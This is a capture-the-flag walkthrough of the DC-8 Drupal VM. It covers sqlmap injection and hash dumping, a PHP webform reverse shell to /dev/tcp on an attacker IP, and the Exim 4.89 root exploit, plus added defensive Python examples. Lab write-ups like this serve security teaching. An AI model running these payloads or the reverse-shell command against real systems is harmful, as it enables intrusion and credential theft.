多喝热水:http://hackergu.com/
1. Host discovery
Using netdiscover, the target host is found at 192.168.203.134.
2. Port scanning
root@kali:~# nmap -sV -A 192.168.203.134 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 22:40 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.134
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.134
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.203.134:80/node/3
| Form id: webform-client-form-3
|_ Form action: /node/3
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /rss.xml: RSS or Atom feed
| /robots.txt: Robots file
| /UPGRADE.txt: Drupal file
| /INSTALL.txt: Drupal file
| /INSTALL.mysql.txt: Drupal file
| /INSTALL.pgsql.txt: Drupal file
| /CHANGELOG.txt: Drupal v1
| /: Drupal version 7
| /README.txt: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /user/: Potentially interesting folder
|_http-server-header: Apache
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:05:ED:41 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.203.134
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.44 seconds
The target has ports 22 and 80 open; the web site is a Drupal CMS site, version 7.
3. Exploitation
We visit the site:
Two points of interest are marked with red boxes in the screenshot. Clicking the content in the upper box gives the URL:
http://192.168.203.134/node/2
Clicking the lower box instead gives:
http://192.168.203.134/?nid=2
Seeing this, without further ado, test it directly:
Sure enough, there is SQL injection; next, switch to sqlmap.
sqlmap -u http://192.168.203.134/?nid=2 --dbs
----------------------------------------------------------------------------
[22:49:32] [INFO] used SQL query returns 2 entries
[22:49:32] [INFO] retrieved: 'd7db'
[22:49:32] [INFO] retrieved: 'information_schema'
available databases [2]:
[*] d7db
[*] information_schema
sqlmap -u http://192.168.203.134/?nid=2 -D d7db --tables
----------------------------------------------------------------------------
Database: d7db
[88 tables]
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| site_messages_table |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
| webform |
| webform_component |
| webform_conditional |
| webform_conditional_actions |
| webform_conditional_rules |
| webform_emails |
| webform_last_download |
| webform_roles |
| webform_submissions |
| webform_submitted_data |
+-----------------------------+
sqlmap -u http://192.168.203.134/?nid=2 -D d7db -T users --columns
----------------------------------------------------------------------------
Database: d7db
Table: users
[16 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| language | varchar(12) |
| access | int(11) |
| created | int(11) |
| data | longblob |
| init | varchar(254) |
| login | int(11) |
| mail | varchar(254) |
| name | varchar(60) |
| pass | varchar(128) |
| picture | int(11) |
| signature | varchar(255) |
| signature_format | varchar(255) |
| status | tinyint(4) |
| theme | varchar(255) |
| timezone | varchar(32) |
| uid | int(10) unsigned |
+------------------+------------------+
sqlmap -u http://192.168.203.134/?nid=2 -D d7db -T users -C name,pass --dump
----------------------------------------------------------------------------
Database: d7db
Table: users
[2 entries]
+-------+---------------------------------------------------------+
| name | pass |
+-------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-------+---------------------------------------------------------+
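The injection above works because the value of the nid query parameter ends up inside the SQL text. The following is an added example (not code from the post or from Drupal) that puts the vulnerable pattern beside the hardened one using an in-memory SQLite table constructed to resemble a minimal node table; the table contents, the function names and the tampered input are all illustrative:

```python
import sqlite3

# Constructed stand-in for a minimal Drupal "node" table (nid, title, status).
# Sample data only; not the DC-8 database.
NODES = [
    (1, "Welcome", 1),
    (2, "Public article", 1),
    (3, "Unpublished draft", 0),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE node (nid INTEGER PRIMARY KEY, title TEXT, status INTEGER)")
    conn.executemany("INSERT INTO node VALUES (?, ?, ?)", NODES)
    return conn


def titles_unsafe(conn, nid):
    """Vulnerable: the request value is pasted into the SQL string, so the
    database parses whatever the client sent as part of the query."""
    sql = "SELECT title FROM node WHERE status = 1 AND nid = %s ORDER BY nid" % nid
    return [row[0] for row in conn.execute(sql)]


def titles_safe(conn, nid):
    """Hardened: validate the type first (a node id is an integer), then bind
    the value as a parameter so it can never change the query structure."""
    try:
        nid_int = int(nid)
    except (TypeError, ValueError):
        raise ValueError("nid must be an integer")
    sql = "SELECT title FROM node WHERE status = 1 AND nid = ? ORDER BY nid"
    return [row[0] for row in conn.execute(sql, (nid_int,))]


def demo():
    """Run both versions on a normal value and on a tautology that widens the
    WHERE clause (the classic confirmation that a parameter is injectable)."""
    conn = make_db()
    normal = "2"
    tampered = "2 OR 1=1"          # constructed probe value
    results = {
        "unsafe_normal": titles_unsafe(conn, normal),
        "unsafe_tampered": titles_unsafe(conn, tampered),   # leaks unpublished rows
        "safe_normal": titles_safe(conn, normal),
    }
    try:
        titles_safe(conn, tampered)
        results["safe_tampered"] = "executed"
    except ValueError:
        results["safe_tampered"] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Note that the unsafe version also bypasses the status = 1 filter, because AND binds tighter than OR; an injectable integer parameter therefore exposes not just the row the site meant to show but everything the query can reach, which is exactly how sqlmap walked from one parameter to the whole d7db database above.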
Two accounts, captured with no effort~~
Next, use john to crack the passwords.
Only the john user's password was recovered: turtle. Log in to the admin backend.
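The dumped hashes start with $S$, which is Drupal 7's phpass-style format: the fourth character encodes log2 of the SHA-512 iteration count, the next eight characters are the salt, and the rest is a custom base64 of the iterated digest truncated to 55 characters. The following is an added example (a re-implementation of the public algorithm, not Drupal's or the post's code) that parses the cost of john's hash and verifies passwords against a $S$ hash; the helper names and the sample password are assumptions:

```python
import hashlib
import hmac
import os

# Drupal 7 "$S$" password hashes: iterated SHA-512 with a phpass-style encoding.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55           # stored hashes are truncated to 55 characters
MIN_LOG2, MAX_LOG2 = 7, 30  # bounds Drupal 7 accepts for the cost parameter


def _b64(data):
    """Drupal's little-endian base64 over ITOA64 (same scheme as phpass)."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def cost_log2(stored):
    """Fourth character of the hash is log2 of the iteration count."""
    return ITOA64.find(stored[3])


def _crypt(password, setting):
    setting = setting[:12]                 # "$S$" + cost character + 8-char salt
    if setting[0] != "$" or setting[2] != "$":
        return None
    log2 = cost_log2(setting)
    if not MIN_LOG2 <= log2 <= MAX_LOG2:
        return None
    salt = setting[4:12]
    if len(salt) != 8:
        return None
    pw = password.encode("utf-8")
    digest = hashlib.sha512(salt.encode("ascii") + pw).digest()
    for _ in range(1 << log2):             # 2**log2 further rounds
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _b64(digest))[:HASH_LENGTH]


def hash_password(password, log2=15, salt=None):
    """Create a $S$ hash; Drupal 7's default cost is log2 = 15 (32768 rounds)."""
    if salt is None:
        salt = _b64(os.urandom(6))         # 6 random bytes -> 8 salt characters
    return _crypt(password, "$S$" + ITOA64[log2] + salt[:8])


def check_password(password, stored):
    if not stored.startswith("$S$"):
        return False
    computed = _crypt(password, stored)
    return computed is not None and hmac.compare_digest(computed, stored)


# Hash of the "john" account exactly as dumped in the post above.
JOHN_HASH = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"

if __name__ == "__main__":
    rounds = 1 << cost_log2(JOHN_HASH)
    print("cost log2 =", cost_log2(JOHN_HASH), "->", rounds, "SHA-512 rounds")
    print("'turtle' matches john's hash:", check_password("turtle", JOHN_HASH))
```

The cost character D gives 2^15 rounds, Drupal 7's default. That is cheap enough that a short dictionary word such as turtle falls to john in seconds, which is why the admin account with a non-dictionary password survived the same run; the effective defences are password policy and raising the site's password_count_log2 variable, not the hash format itself.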
4. Getting a shell
Following the approach learned in DC-7, we could add a basic page,
but it seems john does not have enough permission, so PHP cannot be written into it.
So we look for another way out.
Eventually a breakthrough was found in webform:
Add:
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.203.129/7777 0>&1' ");
?>
Then save.
So how do we trigger it? Send an email!
After clicking submit, we have the shell.
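The shell above exists only because a non-administrator account was allowed to store PHP in a webform field and the site evaluates it. From the defender's side, two things are worth checking: which stored content uses the php_code text format, and whether any stored text carries execution indicators. The following is an added example (not the post's or Drupal's code) that scans rows shaped like webform's confirmation and email storage; the row layout, the indicator list and the sample rows are constructed for illustration, with the post's own payload used as the positive case:

```python
import re

# Indicators of server-side code execution hidden in CMS-stored content.
# Constructed list; extend it for your own site.
INDICATORS = {
    "php_open_tag": re.compile(r"<\?php\b|<\?=", re.I),
    "exec_function": re.compile(
        r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(", re.I),
    "bash_dev_tcp": re.compile(r"/dev/(tcp|udp)/", re.I),
    "interactive_shell": re.compile(r"\b(ba)?sh\s+-i\b", re.I),
    "backtick_exec": re.compile(r"`[^`]*`"),
}
# Drupal 7's PHP filter module registers the "php_code" text format; any row
# stored with it is executed when rendered, whatever the text looks like.
RISKY_FORMATS = {"php_code"}


def scan_text(text):
    """Names of the indicators that match, in a stable order."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_rows(rows):
    """rows: iterable of (table, row_id, text_format, text). Returns one
    finding per row that matches an indicator or uses a risky format."""
    findings = []
    for table, row_id, fmt, text in rows:
        hits = scan_text(text)
        if fmt in RISKY_FORMATS:
            hits.append("format:" + fmt)
        if hits:
            findings.append({"table": table, "id": row_id, "hits": hits})
    return findings


# Constructed sample rows modelled on webform's confirmation/email fields.
SAMPLE_ROWS = [
    ("webform", 3, "filtered_html", "<p>Thanks for contacting us.</p>"),
    ("webform", 3, "php_code",
     "<?php system(\"bash -c 'bash -i >& /dev/tcp/192.168.203.129/7777 0>&1' \"); ?>"),
    ("webform_emails", 7, "full_html", "Your ticket `123` was received"),  # benign backticks
]


def demo():
    return scan_rows(SAMPLE_ROWS)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The third sample row shows the trade-off: a backtick rule catches PHP's shell-execution operator but also flags ordinary Markdown-style text, so it belongs in a review queue rather than a blocking rule. The root-cause fix is to disable the PHP filter module (or grant the php_code format to no role) so that stored text is never evaluated; the scan is for finding what is already there.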
5. Privilege escalation
Use this command to find programs with the SUID bit set:
find / -user root -perm -4000 -print 2>/dev/null
We notice an exim4:
Exim is an MTA (Mail Transfer Agent) server software, developed under the GPL and open source. It mainly runs on Unix-like systems and is usually deployed together with software such as Dovecot or Courier. Exim is also the English abbreviation of "Export-Import".
As can be seen, it does have many vulnerabilities. Check exim's version number with the command exim -bV:
The version is 4.89.
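The two facts that make this step possible are a setuid-root binary that is not on the host's expected list and an Exim version older than the fix release. The following is an added example (not the post's code or any Exim tooling) of an audit that walks a directory tree for setuid files, diffs them against a baseline, and parses the first line of exim -bV; the baseline set, the minimum patched version passed as a parameter, and the temporary directory layout are assumptions made for the demonstration:

```python
import os
import re
import shutil
import stat
import tempfile

# Expected setuid-root binaries on a minimal Debian host. Constructed for
# illustration; derive yours from a known-good image of the same release.
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/mount", "/bin/umount"}


def find_setuid(root="/"):
    """Regular files under root with the setuid bit set: the same set that
    'find / -perm -4000' reports (without the -user root filter, so the demo
    can run in a temp dir owned by an unprivileged user)."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def unexpected_setuid(found, baseline, prefix=""):
    """Setuid files not on the baseline; prefix strips a chroot or temp root."""
    result = []
    for p in found:
        rel = p[len(prefix):] if prefix and p.startswith(prefix) else p
        if rel not in baseline:
            result.append(rel)
    return sorted(result)


VERSION_RX = re.compile(r"^Exim version (\d+)\.(\d+)")


def exim_version(bv_output):
    """(major, minor) from the first line of 'exim -bV' output, else None."""
    m = VERSION_RX.match(bv_output)
    return (int(m.group(1)), int(m.group(2))) if m else None


def exim_needs_attention(bv_output, min_patched=(4, 92)):
    """True when the installed version is below the first patched release
    (min_patched is an assumed threshold; take it from the vendor advisory)."""
    v = exim_version(bv_output)
    return v is not None and v < min_patched


def demo():
    """Build a throwaway tree with one expected and one unexpected setuid file."""
    root = tempfile.mkdtemp()
    try:
        layout = {"usr/bin/passwd": 0o4755, "usr/sbin/exim4": 0o4755, "usr/bin/ls": 0o755}
        for rel, mode in layout.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(b"#!/bin/sh\n")
            os.chmod(path, mode)
        unexpected = unexpected_setuid(find_setuid(root), BASELINE, prefix=root)
    finally:
        shutil.rmtree(root)
    bv = "Exim version 4.89 #1 built 01-Jan-2018 00:00:00\n"   # constructed output
    return {"unexpected": unexpected, "exim_old": exim_needs_attention(bv)}


if __name__ == "__main__":
    print(demo())
```

On a real host run find_setuid("/") as root and keep the baseline under version control; a setuid mail daemon that the box never needed is the finding to act on, either by patching Exim or by removing the binary and its setuid bit.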
Then look it up in searchsploit:
There is indeed a script whose version range matches and which is a local privilege escalation.
Two ways to use it:
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
----------------------------------------------------------------
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
Next, start a web server, download the script into /tmp on the target machine, grant execute permission with chmod +x 46996.sh, and run it:
We use the netcat method, but it keeps failing with an error:
bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory
Searching online for the cause: the script was written on Windows, so its lines end in CRLF, and the trailing carriage return (shown as ^M) becomes part of the interpreter path, so Linux cannot run it as-is.
We need to convert the file to Unix format with the following command:
root@kali:~# dos2unix 46996.sh
dos2unix: 正在转换文件 46996.sh 为Unix格式...
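The error text /bin/bash^M shows exactly what the kernel saw: it reads the shebang line up to the newline only, so the carriage return stays glued to the interpreter path. The following is an added example (not the post's code or dos2unix itself) that extracts the interpreter the way the kernel does, reports CRLF endings, and performs the same CRLF-to-LF conversion; the sample script bytes are constructed:

```python
def shebang_interpreter(script):
    """Interpreter path the kernel would take from the first line of a script:
    everything after '#!' up to the first space, terminated by LF only."""
    if not script.startswith(b"#!"):
        return None
    first_line = script.split(b"\n", 1)[0]
    return first_line[2:].strip(b" \t").split(b" ")[0]


def has_crlf(script):
    return b"\r\n" in script


def to_unix(script):
    """What dos2unix does by default: CRLF -> LF, lone CRs left untouched."""
    return script.replace(b"\r\n", b"\n")


SAMPLE = b"#!/bin/bash\r\necho hello\r\n"   # constructed script with Windows line endings


def demo():
    return {
        "before": shebang_interpreter(SAMPLE),          # path still carries the CR
        "after": shebang_interpreter(to_unix(SAMPLE)),  # clean path
        "fixed_has_crlf": has_crlf(to_unix(SAMPLE)),
    }


if __name__ == "__main__":
    print(demo())
```

The same check is useful on the defensive side: scripts dropped into /tmp with CRLF endings, or a download history showing a file fetched and then converted, are the kind of low-level artefacts an incident responder can still find after the shell is gone.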
With that problem solved everything works; grab the flag!
www-data@dc-8:/tmp$ ./46996.sh -m netcat
./46996.sh -m netcat
raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Mon, 17 Feb 2020 12:51:15 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1j3WV9-0000MX-2j
221 dc-8 closing connection
Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-8:/var/spool/exim4# whoami
whoami
whoami
root
root@dc-8:/var/spool/exim4# cd /root
cd /root
cd /root
root@dc-8:/root# ls
ls
ls
flag.txt
root@dc-8:/root# cat flag.txt
cat flag.txt
cat flag.txt
Brilliant - you have succeeded!!!
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm also sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
This challenge was largely based on two things:
1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42
The answer to that question is...
If you enjoyed this CTF, send me a tweet via @DCAU7.